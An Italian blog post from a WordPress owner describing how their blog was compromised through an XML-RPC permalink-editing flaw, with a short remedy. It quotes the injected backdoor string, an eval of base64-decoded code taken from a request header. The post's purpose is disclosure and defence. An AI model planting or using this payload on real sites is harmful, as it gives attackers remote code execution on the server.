WordPress 2.3 MySql Injection via XMLRPC

Del tutto per sbaglio, mi sono reso conto solo oggi che il mio blog ha subito un attacco di tipo MySQL injection via XMLRPC. Non avendo accesso ai log di sistema, non posso capire a quando risalga questo attacco, credo comunque al più ricada negli ultimi 3 giorni.

Mi ha insospettito l’aver incollato il link al mio ultimo post nel mio status Facebook. Ho, infatti, notato che il link presentava, nella sua parte finale, la seguente stringa:

%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

Cercando maggiori informazioni su Google, ho riscontrato che da ieri sono tantissimi i blog su piattaforma WordPress sotto attacco.

Tipo di Attacco: Non è ancora chiaro come funzioni, ma pare che varie versioni di WordPress siano attaccabili tramite questo exploit che consente agli utenti (non admin) di editare la struttura dei permalink del sito iniettando del codice PHP tramite una chiamata XML-RPC.

Soluzione: si deve modificare le opzioni della struttura dei propri permalink, dal pannello di controllo di wordpress ed, eventualmente, eliminare gli utenti admin registratisi (nel mio caso, però, non ho riscontrato la presenza di ulteriori admin).

Related Posts: